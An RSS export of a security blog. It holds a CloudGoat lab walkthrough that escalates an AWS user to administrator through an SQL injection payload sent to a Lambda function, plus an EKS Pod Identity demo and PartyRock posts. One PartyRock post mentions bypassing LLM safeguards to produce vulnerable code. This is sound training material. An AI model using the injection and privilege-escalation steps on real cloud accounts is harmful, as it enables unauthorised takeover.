<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Rewanth Tammana's Blog]]></title><description><![CDATA[Rewanth Tammana is a security ninja, open-source contributor, and Senior Security Architect. He is passionate about DevSecOps, Application, and Container Securi]]></description><link>https://blog.rewanthtammana.com</link><generator>RSS for Node</generator><lastBuildDate>Sat, 11 Apr 2026 14:08:51 GMT</lastBuildDate><atom:link href="https://blog.rewanthtammana.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[CloudGoat 2.0 - vulnerable_lambda]]></title><description><![CDATA[vulnerable_lambda is one of the scenarios from CloudGoat - An intentionally vulnerable by design AWS setup.
Difficulty: Easy
Hands-On
Task
Initialize the terraform script to set the vulnerable scenario on your AWS account.
./cloudgoat.py create vulne...]]></description><link>https://blog.rewanthtammana.com/vulnerable-lambda</link><guid isPermaLink="true">https://blog.rewanthtammana.com/vulnerable-lambda</guid><category><![CDATA[cloudgoat]]></category><category><![CDATA[AWS]]></category><category><![CDATA[IAM]]></category><category><![CDATA[lambda]]></category><category><![CDATA[Applications]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Tue, 26 Dec 2023 13:42:44 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1703594084123/452d7cc4-a71a-4b6b-9225-7d32abe093b1.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><a target="_blank" href="https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/vulnerable_lambda/README.md">vulnerable_lambda</a> is one of the scenarios from <a target="_blank" href="https://github.com/RhinoSecurityLabs/cloudgoat">CloudGoat</a> - An intentionally vulnerable by design AWS setup.</p>
<p>Difficulty: Easy</p>
<h2 id="heading-hands-on">Hands-On</h2>
<h3 id="heading-task">Task</h3>
<p>Initialize the terraform script to set the vulnerable scenario on your AWS account.</p>
<pre><code class="lang-bash">./cloudgoat.py create vulnerable_lambda
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700635525120/04f31305-fa88-4646-a3e9-b46cac4a146a.png" alt class="image--center mx-auto" /></p>
<p>Once the setup is complete, the new account credentials will be available in the below file.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700635721192/8fe9b6bb-4d87-4ad4-97dd-c810af536621.png" alt class="image--center mx-auto" /></p>
<p>The task is to use these credentials to authenticate as low privileged user &amp; escalate the privileges in the cloud environment.</p>
<h3 id="heading-hints">Hints</h3>
<p>The creator leaves us some hints to leverage &amp; fast-track the win.</p>
<p><img src="https://github.com/RhinoSecurityLabs/cloudgoat/raw/master/scenarios/vulnerable_lambda/exploitation_route.png" alt="Lucidchart Diagram" /></p>
<h3 id="heading-solution">Solution</h3>
<p>Authenticate using the new credentials. We use bilbo (got from hints screenshot)</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Uses stdout instead of vim to show output</span>
<span class="hljs-built_in">export</span> AWS_PAGER=
aws configure --profile bilbo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700636742592/63dfc6a2-9357-4b43-9e83-571e2285e599.png" alt class="image--center mx-auto" /></p>
<p>Check the user ID and account information</p>
<pre><code class="lang-bash">aws sts get-caller-identity --profile bilbo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700636884016/8d7c0279-f6c9-4658-88b5-3b0473bf0f67.png" alt class="image--center mx-auto" /></p>
<p>In the hints screenshot, it says "List IAM" roles. Let's try to do that</p>
<pre><code class="lang-bash">aws iam list-roles --profile bilbo | jq <span class="hljs-string">'.Roles[].RoleName'</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700637347388/b61a6a9b-ad56-4597-8e44-09d24166bdaa.png" alt class="image--center mx-auto" /></p>
<p>Among tens of roles, these two stand out for me considering, we are solving <code>vulnerable_lambda</code> challenge. Let's see what they are made of!</p>
<p>The <code>&lt;role_name&gt;</code> in the below command will be different for you as its randomly generated. Replace it accordingly.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> ROLE_NAME=cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10
aws iam get-role --profile bilbo --role-name <span class="hljs-variable">$ROLE_NAME</span> | jq -r <span class="hljs-string">'.Role.AssumeRolePolicyDocument.Statement'</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700637657093/3035674a-eddb-4a63-9c8a-9a688f2e25d9.png" alt class="image--center mx-auto" /></p>
<p>We have two roles - one can assume any role as the current user &amp; other can assume a role as lambda. Let's assume the <code>cg-lambda-invoker-...</code> role. To assume, the role, we need the role ARN.</p>
<pre><code class="lang-bash">aws iam get-role --profile bilbo --role-name <span class="hljs-variable">$ROLE_NAME</span> | jq -r <span class="hljs-string">'.Role.Arn'</span>
</code></pre>
<p>Use the arn from above &amp; use it to assume role</p>
<pre><code class="lang-bash">aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700638264685/370ae921-6ee4-4af8-b225-b3c2e797bb5e.png" alt class="image--center mx-auto" /></p>
<p>Create a new profile with this assumed role or export them as environment variables</p>
<pre><code class="lang-bash">output=$(aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session)
<span class="hljs-built_in">export</span> AWS_ACCESS_KEY_ID=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$output</span> | jq -r <span class="hljs-string">'.Credentials.AccessKeyId'</span>)
<span class="hljs-built_in">export</span> AWS_SECRET_ACCESS_KEY=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$output</span> | jq -r <span class="hljs-string">'.Credentials.SecretAccessKey'</span>)
<span class="hljs-built_in">export</span> AWS_SESSION_TOKEN=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$output</span> | jq -r <span class="hljs-string">'.Credentials.SessionToken'</span>)
aws sts get-caller-identity
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700638485982/3caffc8b-1a35-4c89-9945-4d2afab59f5c.png" alt class="image--center mx-auto" /></p>
<p>We can see, the current Arn points to <code>vulnerable-lambda-session</code>, so we are on the right path. Since this user is capable of performing lambda operations, let's try to list the lambda functions.</p>
<h4 id="heading-lambda-functions-amp-analysis">Lambda functions &amp; analysis</h4>
<pre><code class="lang-bash">aws lambda list-functions
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700638729879/ee6445fa-37d3-4212-8c78-754fe16183e9.png" alt class="image--center mx-auto" /></p>
<p>In the description, we can see, <code>This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...</code></p>
<p>If that's true, we can add a managed policy like <code>AdministratorAccess</code> to our user &amp; elevate the privileges. To validate, let's download the source code.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Get function name</span>
aws lambda list-functions | jq -r <span class="hljs-string">'.Functions[].FunctionName'</span>
aws lambda get-function --function-name $(aws lambda list-functions | jq -r <span class="hljs-string">'.Functions[].FunctionName'</span>) |  jq -r <span class="hljs-string">'.Code'</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700638845117/ae6bc63b-e3fc-4e44-9e78-9cc5107dc619.png" alt class="image--center mx-auto" /></p>
<p>Download the source code from this location.</p>
<pre><code class="lang-bash">mkdir /tmp/<span class="hljs-built_in">test</span>
wget -O /tmp/<span class="hljs-built_in">test</span>/download.zip $(aws lambda get-function --function-name $(aws lambda list-functions | jq -r <span class="hljs-string">'.Functions[].FunctionName'</span>) | jq -r <span class="hljs-string">'.Code.Location'</span>)
<span class="hljs-built_in">cd</span> /tmp/<span class="hljs-built_in">test</span>
unzip download.zip
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700639024384/7aebc850-f367-4540-93e2-e03b15ff6944.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700639094644/f02cf042-28c4-499a-a484-8009b95c1fdb.png" alt class="image--center mx-auto" /></p>
<p>If you scroll to the end in <code>main.py</code>, we can the payload structure to invoke the lambda function.</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"policy_names"</span>: [
        <span class="hljs-string">"AmazonSNSReadOnlyAccess"</span>,
        <span class="hljs-string">"AWSLambda_ReadOnlyAccess"</span>
    ],
    <span class="hljs-attr">"user_name"</span>: <span class="hljs-string">"cg-bilbo-user"</span>
}
</code></pre>
<p>Check the username of the <code>bilbo</code> profile user.</p>
<pre><code class="lang-bash">aws sts get-caller-identity --profile bilbo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700809062088/cf05f79e-77d7-41d2-8604-edb0f60507c9.png" alt class="image--center mx-auto" /></p>
<p>Now, let's use this bilbo user &amp; try to assign overprivileged permissions. In my case, the <code>user_name</code> is <code>cg-bilbo-vulnerable_lambda_cgid0isrortd10</code>. Save below inforamtion to <code>payload.json</code></p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"policy_names"</span>: [
        <span class="hljs-string">"AmazonSNSReadOnlyAccess"</span>,
        <span class="hljs-string">"AWSLambda_ReadOnlyAccess"</span>,
        <span class="hljs-string">"AdministratorAccess"</span>
    ],
    <span class="hljs-attr">"user_name"</span>: <span class="hljs-string">"cg-bilbo-vulnerable_lambda_cgid0isrortd10"</span>
}
</code></pre>
<p>Let's use the current user with permissions to invoke lambda functions &amp; pass this as input.</p>
<pre><code class="lang-bash">aws lambda invoke --function-name vulnerable_lambda_cgid0isrortd10-policy_applier_lambda1 --payload file://./payload.json --cli-binary-format raw-in-base64-out out.txt
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700809733527/a40e0df0-ff64-408d-8265-6072dc189319.png" alt class="image--center mx-auto" /></p>
<p>If you see the output, it says <code>AdministratorAccess</code> isn't an approved policy.</p>
<h4 id="heading-sql-injection">SQL Injection</h4>
<p>If you see the <code>main.py</code> code, there's no validation on user input &amp; it open's up a possibility for SQL injection.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700809851101/17861a5d-c030-455a-a355-38779e7492b0.png" alt class="image--center mx-auto" /></p>
<p>Let's try to create a payload with SQL injection.</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"policy_names"</span>: [
        <span class="hljs-string">"AmazonSNSReadOnlyAccess"</span>,
        <span class="hljs-string">"AWSLambda_ReadOnlyAccess"</span>,
        <span class="hljs-string">"AdministratorAccess' --"</span>
    ],
    <span class="hljs-attr">"user_name"</span>: <span class="hljs-string">"cg-bilbo-vulnerable_lambda_cgid0isrortd10"</span>
}
</code></pre>
<p>Invoke the lambda function!</p>
<pre><code class="lang-bash">aws lambda invoke --function-name vulnerable_lambda_cgid0isrortd10-policy_applier_lambda1 --payload file://./payload.json --cli-binary-format raw-in-base64-out out.txt
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700809971048/74d15615-9e0a-42d0-83cd-852e56ee6491.png" alt class="image--center mx-auto" /></p>
<p>Let's check the permissions of this <code>bilbo</code> user now. We can check it using <code>list-attached-user-policies</code></p>
<pre><code class="lang-bash">aws sts get-caller-identity --profile bilbo <span class="hljs-comment"># Get user-name from here</span>
aws iam list-attached-user-policies --profile bilbo --user-name cg-bilbo-vulnerable_lambda_cgid0isrortd10
</code></pre>
<p>As you can see in the output, we have now <code>AdministratorAccess</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700810159162/5d4f2a8c-90e2-4672-9c52-d805921425bf.png" alt class="image--center mx-auto" /></p>
<p>We successfully elevated the privileges to be an administrator.</p>
]]></content:encoded></item><item><title><![CDATA[Rethinking Authentication: AWS ReInvent 2023 Unveils EKS Pod Identity]]></title><description><![CDATA[Two weeks ago at AWS ReInvent, the AWS team released a new add-on for the EKS cluster. This feature simplifies the access to AWS services from EKS pods. This blog is a hands-on demonstration & exploration of this feature.
Scenario
To demonstrate the ...]]></description><link>https://blog.rewanthtammana.com/rethinking-authentication-aws-reinvent-2023-unveils-eks-pod-identity</link><guid isPermaLink="true">https://blog.rewanthtammana.com/rethinking-authentication-aws-reinvent-2023-unveils-eks-pod-identity</guid><category><![CDATA[AWS]]></category><category><![CDATA[reInvent]]></category><category><![CDATA[EKS]]></category><category><![CDATA[Security]]></category><category><![CDATA[authentication]]></category><category><![CDATA[Kubernetes]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 13 Dec 2023 11:03:44 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1702449112970/bffe13bb-3cd4-4d73-b920-1c9eb7e2ee64.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Two weeks ago at <a target="_blank" href="https://aws.amazon.com/about-aws/whats-new/2023/11/amazon-eks-pod-identity/">AWS ReInvent</a>, the AWS team released a new add-on for the EKS cluster. This feature simplifies the access to AWS services from EKS pods. This blog is a hands-on demonstration &amp; exploration of this feature.</p>
<h2 id="heading-scenario">Scenario</h2>
<p>To demonstrate the new feature, I'll borrow a scenario from my <a target="_blank" href="https://blog.rewanthtammana.com/securing-aws-eks-implementing-least-privilege-access-with-irsa#heading-scenario">previous article on IRSA (IAM Roles for Service Accounts)</a>. In short, we will deploy an application on EKS that fetches random images from the internet every 30 seconds, &amp; uploads them to an s3 bucket. Only this time, instead of IRSA, we will use this new feature.</p>
<pre><code class="lang-bash">IMAGE=rewanthtammana/secure-eks:pod-identity-demo
git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/secure-eks
<span class="hljs-built_in">cd</span> secure-eks/pod-identity-demo
docker build -t <span class="hljs-variable">$IMAGE</span> .
docker push <span class="hljs-variable">$IMAGE</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702212677048/ccad27a0-fb9c-4fe8-a966-92cdae8857ba.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-hands-on-demo">Hands-on Demo</h2>
<p>Let's create an EKS cluster to experiment.</p>
<pre><code class="lang-yaml"><span class="hljs-comment">#config.yaml</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">eksctl.io/v1alpha5</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterConfig</span>

<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-identity-demo</span>
  <span class="hljs-attr">region:</span> <span class="hljs-string">us-east-1</span>
  <span class="hljs-attr">version:</span> <span class="hljs-string">'1.26'</span>

<span class="hljs-attr">nodeGroups:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ng-general</span>
    <span class="hljs-attr">instanceType:</span> <span class="hljs-string">t2.small</span>
    <span class="hljs-attr">instanceName:</span> <span class="hljs-string">pod-identity-demo-node</span>
    <span class="hljs-attr">desiredCapacity:</span> <span class="hljs-number">1</span>
</code></pre>
<pre><code class="lang-bash">eksctl create cluster -f config.yaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702212796425/4cabef21-a258-447d-9d20-3f6946771f19.png" alt class="image--center mx-auto" /></p>
<p>List the cluster.</p>
<pre><code class="lang-bash">eksctl get clusters
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702205929527/af793996-cce8-4c06-87ba-c93e66358df3.png" alt class="image--center mx-auto" /></p>
<p><code>eksctl</code> integrated this new feature in its recent release. Make sure <code>eksctl</code> is updated.</p>
<pre><code class="lang-bash">eksctl version
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206031156/1cb839e7-89b6-489a-8346-0a998a737c8b.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-enable-add-on">Enable Add On</h3>
<p>We need to have <code>eks-pod-identity-agent</code> addon to create a controller to use this feature.</p>
<pre><code class="lang-bash">eksctl create addon --name eks-pod-identity-agent --cluster <span class="hljs-variable">$CLUSTER_NAME</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206514451/c489b653-cbd4-48c8-be9a-57991e626478.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash">kubectl get ds -A
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206624923/863020ad-210a-4b22-bfc5-fbd523d70349.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> SERVICE_ACCOUNT_NAME=anything
eksctl create podidentityassociation --cluster <span class="hljs-variable">$CLUSTER_NAME</span> --namespace default --service-account-name <span class="hljs-variable">$SERVICE_ACCOUNT_NAME</span> --permission-policy-arns <span class="hljs-variable">$policy_arn</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206664021/5d8a8c06-f2fe-4310-ada9-06b2816592b6.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash">aws cloudformation describe-stack-resources --stack-name eksctl-pod-identity-demo-podidentityrole-ns-default-sa-anything
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206979222/fbce0047-48ab-4636-9a01-3d72e0999a8a.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> role_name=$(aws cloudformation describe-stack-resources --stack-name eksctl-pod-identity-demo-podidentityrole-ns-default-sa-anything | jq -r <span class="hljs-string">'.StackResources[].PhysicalResourceId'</span>)
<span class="hljs-built_in">echo</span> <span class="hljs-variable">$role_name</span>
aws iam list-attached-role-policies --role-name <span class="hljs-variable">$role_name</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207078257/53bf8126-4af2-40b1-ae1e-df93042ad58b.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-pod-identity-association">Pod Identity Association</h3>
<p>List the <code>podidentityassociation</code> in the EKS clusters.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> CLUSTER_NAME=pod-identity-demo
eksctl get podidentityassociation --cluster <span class="hljs-variable">$CLUSTER_NAME</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702205981148/a82e0cfd-51ba-4b84-bd04-5ebd567483c7.png" alt class="image--center mx-auto" /></p>
<p>Create an AWS policy to write objects to an s3 bucket.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> BUCKET_NAME=random-pod-identity-demo
<span class="hljs-built_in">echo</span> <span class="hljs-string">"{
    \"Version\": \"2012-10-17\",
    \"Statement\": [
        {
            \"Effect\": \"Allow\",
            \"Action\": [
                \"s3:PutObject\"
            ],
            \"Resource\": [
                \"arn:aws:s3:::<span class="hljs-variable">$BUCKET_NAME</span>/*\"
            ]
        }
    ]
}"</span> &gt; s3-<span class="hljs-variable">$BUCKET_NAME</span>-access.json

<span class="hljs-built_in">export</span> POLICY_NAME=pod-identity-bucket-s3-write-policy
<span class="hljs-built_in">export</span> create_policy_output=$(aws iam create-policy --policy-name <span class="hljs-variable">$POLICY_NAME</span> --policy-document file://s3-<span class="hljs-variable">$BUCKET_NAME</span>-access.json)
<span class="hljs-built_in">export</span> policy_arn=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$create_policy_output</span> | jq -r <span class="hljs-string">'.Policy.Arn'</span>)
<span class="hljs-built_in">echo</span> <span class="hljs-variable">$policy_arn</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206213559/1084523c-dccb-47fe-be4a-f7fb819f60f8.png" alt class="image--center mx-auto" /></p>
<p>Make the s3 bucket, create a service account that was used to create podidentityassociation &amp; create a job using that service account to upload pictures to the s3 bucket.</p>
<pre><code class="lang-bash">aws s3 mb s3://<span class="hljs-variable">$BUCKET_NAME</span> --region us-east-1
kubectl create sa <span class="hljs-variable">$SERVICE_ACCOUNT_NAME</span>

<span class="hljs-built_in">echo</span> <span class="hljs-string">"apiVersion: batch/v1
kind: Job
metadata:
  name: pod-identity-demo
spec:
  template:
    spec:
      serviceAccountName: <span class="hljs-variable">$SERVICE_ACCOUNT_NAME</span>
      containers:
      - name: pod-identity-demo-container
        image: rewanthtammana/secure-eks:pod-identity-demo
        env:
        - name: AWS_REGION
          value: us-east-1
        - name: S3_BUCKET_NAME
          value: <span class="hljs-variable">$BUCKET_NAME</span>
      restartPolicy: Never"</span> | kubectl apply -f-
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207491885/30799d6b-1a18-485f-94b4-10ef4f9818d9.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash">kubectl get <span class="hljs-built_in">jobs</span>
kubectl get po -l job-name=pod-identity-demo
kubectl logs -l job-name=pod-identity-demo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207626164/def0a47e-82bf-4cb1-a36e-408bd3665a08.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-irsa-vs-pod-identity">IRSA vs Pod Identity</h2>
<p>How does this feature differ from IRSA?</p>
<p>To analyze, let's create a service account that will be used in an IRSA fashion.</p>
<pre><code class="lang-bash">eksctl utils associate-iam-oidc-provider \
  --cluster <span class="hljs-variable">$CLUSTER_NAME</span> \
  --approve
eksctl create iamserviceaccount --name irsa-demo \
  --namespace default \
  --cluster <span class="hljs-variable">$CLUSTER_NAME</span> \
  --attach-policy-arn <span class="hljs-variable">$policy_arn</span> \
  --approve
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207869319/7d890eea-6a46-46d8-81c0-da310c69c61d.png" alt class="image--center mx-auto" /></p>
<p>The <code>anything</code> service account is used by the Pod Identity feature and <code>irsa-demo</code> service account. The key difference is in the annotation.</p>
<pre><code class="lang-bash">kubectl get sa
kubectl get sa <span class="hljs-variable">$SERVICE_ACCOUNT_NAME</span> -oyaml
kubectl get sa irsa-demo -oyaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207975242/b152cfaa-f1aa-4dae-952f-36f3f629b73a.png" alt class="image--center mx-auto" /></p>
<p>In the case of IRSA, there's no direct way to identify the list of service accounts that are leveraging IRSA, performing actions, etc. We can definitely have automation &amp; scripts in place to extract the required information but its tedious. With this new AWS feature, this gets a lot easier.</p>
<pre><code class="lang-bash">eksctl get podidentityassociation
</code></pre>
<h3 id="heading-inside-of-pod-identity-webhook">Inside of Pod Identity Webhook</h3>
<pre><code class="lang-bash">kubectl get po
kubectl <span class="hljs-built_in">exec</span> -it pod-identity-demo-h49cc sh
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702208137422/270a522a-4cf6-46b4-a358-07cf61705d92.png" alt class="image--center mx-auto" /></p>
<p>When the new feature add-on is enabled, it creates a daemon set that's responsible for all authentication operations &amp; validations.</p>
<pre><code class="lang-bash">kubectl get ds -n kube-system eks-pod-identity-agent -oyaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702208573305/96b76e07-d55b-48eb-a87f-4db55c35c34c.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash">kubectl logs -n kube-system eks-pod-identity-agent-x5wml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702208721565/f526d4ae-dd65-4b39-9f41-9755385e1ad6.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-cleanup">Cleanup</h2>
<pre><code class="lang-bash">aws iam delete-policy --policy-arn <span class="hljs-variable">$policy_arn</span>
aws s3 rm s3://<span class="hljs-variable">$BUCKET_NAME</span> --recursive
aws s3 rb s3://<span class="hljs-variable">$BUCKET_NAME</span>
eksctl delete cluster --name <span class="hljs-variable">$CLUSTER_NAME</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702208950974/58627432-cb94-43ac-bb41-f0bbb1d3c767.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>EKS Pod Identity provides a new simplified &amp; secure way to allow EKS pods to connect with other AWS services. Though AWS has IRSA, managing it at scale is a relatively tedious task when compared with <code>eks-pod-identity-agent</code>.</p>
<p><code>eksctl get podidentityassociation</code> lists all the service accounts that are connecting with other AWS resources. Subsequently, we can list all pods using those service accounts to see which resources have elevated permissions &amp; audit them.</p>
]]></content:encoded></item><item><title><![CDATA[No Code? No Problem! Crafting AI Apps with AWS PartyRock]]></title><description><![CDATA[Generative AI, LLMs, & GPTs are the buzzwords these days. Every day numerous tools & websites are launched with AI offerings. Most often, the best ones are expensive to afford & the free ones won't give desired results.
Just a week ago, AWS launched ...]]></description><link>https://blog.rewanthtammana.com/no-code-no-problem-crafting-ai-apps-with-aws-partyrock</link><guid isPermaLink="true">https://blog.rewanthtammana.com/no-code-no-problem-crafting-ai-apps-with-aws-partyrock</guid><category><![CDATA[AWS]]></category><category><![CDATA[No Code]]></category><category><![CDATA[Amazon Bedrock]]></category><category><![CDATA[generative ai]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 29 Nov 2023 11:33:40 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1701008056042/8018eefb-89eb-4eb0-8753-e47f00838763.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Generative AI, LLMs, &amp; GPTs are the buzzwords these days. Every day numerous tools &amp; websites are launched with AI offerings. Most often, the best ones are expensive to afford &amp; the free ones won't give desired results.</p>
<p>Just a week ago, AWS launched <a target="_blank" href="https://aws.amazon.com/about-aws/whats-new/2023/11/partyrock-amazon-bedrock-playground/">PartyRock</a>, an <a target="_blank" href="https://aws.amazon.com/bedrock/">Amazon Bedrock Playground</a>. It's a Generative AI app-building platform. No code required, just a web interface that takes text &amp; generates the desired apps. The best part is it's free of cost &amp; doesn't require an AWS account.</p>
<p>We will create a few apps to benchmark the capability of the platform.</p>
<h3 id="heading-coursefinder-tailored-learning-pathways">CourseFinder: Tailored Learning Pathways</h3>
<p>We want to learn new things but with access to unlimited content on the internet, it's hard to find the right path. <a target="_blank" href="https://partyrock.aws/u/testinguser883/dsDXBSfex/CourseFinder">This CourseFinder app</a> takes input from you &amp; suggests the best courses available. The best part is once you review the results, you can enter the timeframe you've to spend on it &amp; it suggests a tailored path for the timeframe.</p>
<p>The path to learning "iPhone photography".</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700999800220/6a4ebec0-f2fd-4749-9387-264ee6e370e9.png" alt class="image--center mx-auto" /></p>
<p>The path to learning "Asian cooking".</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701000119739/e87dc69f-efb6-48f2-b071-c060b10129fc.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-storytelling-an-innovative-approach">Storytelling: An Innovative Approach</h3>
<p>Kids and adults love stories &amp; movies. We wonder what if the storyline takes an alternative approach once in a while. <a target="_blank" href="https://partyrock.aws/u/testinguser883/gd1rXnaMP/StoryPathGenerator">This app</a> generates multiple ways for the story, you can choose any option for the way forward &amp; it generates an image.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701002172064/8886e112-d99d-42e1-8db4-03c2fe793f8b.png" alt class="image--center mx-auto" /></p>
<p>This can easily be expanded to write an entire storybook. For example, once the image is generated, create a new widget to suggest the next 4 story lines, take user input, update the image &amp; suggest the next 4 story paths to move ahead. This will be a lot of fun!</p>
<p>Being from a security background, I was curious on how this can help with security related work. Let's benchmark!</p>
<h3 id="heading-ctf-challenges-builder">CTF Challenges Builder</h3>
<p>Security teams are enthusiastic about playing CTFs that include challenges from different areas like cryptography, steganography, web, mobile, network, reversing, malware &amp; so on. We can use this to generate ideas for innovative CTF challenges &amp; chaining of attacks.</p>
<p><strong>NOTE: I'm not making this app public as I hacked my way into the LLMs to make it generate vulnerable code for various tech stacks &amp; exploit it.</strong></p>
<h4 id="heading-ssrf-vulnerability">SSRF vulnerability</h4>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701004048474/62fefd7a-5ebd-4697-a3a3-da9cc22f3bdc.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701004090158/3391ced8-b826-4423-aa3c-f06c79b6707c.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-host-header-injection-vulnerability">Host Header Injection Vulnerability</h4>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701004197801/dbc42e45-e97d-4578-8edd-9a02db017e2e.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701004224928/f09baf23-37bd-40ce-b4b3-e6e6730ecd3f.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-architecture-threat-modeler">Architecture Threat Modeler</h3>
<p>Developers, DevOps and security teams review different system architectures regularly looking for misconfigurations &amp; vulnerabilities.</p>
<p><a target="_blank" href="https://partyrock.aws/u/testinguser883/R4PI1UIc2/Architecture-Threat-Modeler">This app</a> takes the architecture design as input,</p>
<ul>
<li><p>Lists all the possible components that are required to build the design</p>
</li>
<li><p>Once components are identified, it suggests possible Threat Boundaries between all components</p>
</li>
<li><p>Then, it browses the internet &amp; suggests available open-source projects that match the given architecture</p>
</li>
</ul>
<h4 id="heading-3-tier-architecture-in-aws">3 tier architecture in AWS</h4>
